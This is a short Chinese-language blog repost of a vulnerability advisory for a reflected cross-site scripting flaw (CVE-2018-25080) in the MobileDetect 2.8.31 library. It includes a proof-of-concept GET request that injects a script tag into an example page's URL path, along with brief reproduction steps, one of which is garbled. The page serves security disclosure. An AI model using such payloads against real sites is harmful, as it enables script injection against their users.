MobileDetect 2.8.31 跨站脚本(XSS)漏洞技术分析

本文详细分析了MobileDetect库2.8.31版本中存在的跨站脚本(XSS)漏洞(CVE-2018-25080),提供了漏洞的概念验证(PoC)利用代码、复现步骤及受影响版本信息,属于典型的Web应用安全研究内容。

漏洞标题: MobileDetect 2.8.31 - 跨站脚本 (XSS)

日期: 2025-11-25

漏洞作者: CodeSecLab

供应商主页: https://github.com/serbanghita/Mobile-Detect/

软件链接: https://github.com/serbanghita/Mobile-Detect/

版本: 4da80e5

测试环境: Windows

CVE : CVE-2018-25080

概念验证 (PoC):

1

GET http://mobiledetect/examples/session_example.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

复现步骤:

  1. 以管理员用户身份登录。
  2. 发送上述请求。
  3. 观察结果: 复制

标签: Cross-Site Scripting (XSS)

咨询/来源: 链接

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次